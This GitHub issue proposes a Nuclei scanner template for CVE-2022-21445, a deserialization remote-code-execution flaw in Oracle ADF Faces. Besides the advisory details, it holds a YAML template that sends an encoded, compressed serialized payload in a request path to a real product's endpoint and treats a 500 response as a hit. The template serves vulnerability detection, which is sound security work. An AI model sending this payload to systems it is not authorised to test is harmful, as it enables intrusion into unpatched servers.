### ISSUE TITLE
oracle-adf-faces-miracle-rce PoC CVE-2022-21445

### ISSUE THREAD

**Issue by x4yah** [projectdiscovery/nuclei-templates#8794]
### Template Information:

Vulnerability in the Oracle JDeveloper product of Oracle Fusion Middleware (component: ADF Faces). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks of this vulnerability can result in takeover of Oracle JDeveloper. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

### info:

- name: Oracle ADF Faces 'Miracle' RCE CVE-2022-21445
- severity: critical
- reference: [CVE-2022-21445](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21445) 
     - [NIST](https://nvd.nist.gov/vuln/detail/CVE-2022-21445) 
     - [Oracle]( https://www.oracle.com/security-alerts/cpuapr2022.html)

### Nuclei Template:

```yaml
id: oracle-adf-faces-miracle-rce
info:
  name: Oracle ADF Faces 'Miracle' RCE (CVE-2022-21445)
  author: Diego Aristiguieta AKA X4yh
  severity: high
  tags: cve, cve2022, oracle
  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21445
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-502
 

http:
  - method: GET
    path:
      - "{{BaseURL}}/bicomposer/afr/khewz/remote/H4sIAAAAAAAACnWMsU7DMBCGr6RRU9QBGBg6IrHaLZRAYSgSUkWksIDYcRu3NjKxsa_FXXgMnoKXQDwBKzMrb4AETpWVX7rTd9L93%2Bs3xM7C9j1bMrJAqcglc%2BKKmbj1%2Bfa%2Be_cRwcYYNpVmxZhNUdsM2igsd0KrwpvROVTpPCVhb4VpBFlnLSs5ktvr_GX_OO3%2BfNkIWhkkIsgvdMEzaBptMYc2W6DQVuIKYSevilSxck5v0MpyfpZDcyYVf4RniAIL7bDmxFiNeqpVfUeWz9bozW8dhK6Q2Ds4TAe94SDtD4_6JxMy8c6RB47QoNV_jEGLaIxH2KvglNL_W9T_AbBHMtQxAQAA/"
    headers:
      Cookie: ORA_BIPS_LBINFO=18c5565cd8a
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Encoding: gzip,deflate,br
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
      Connection: Keep-alive
    matchers:
      - type: status
        status:
          - 500


```
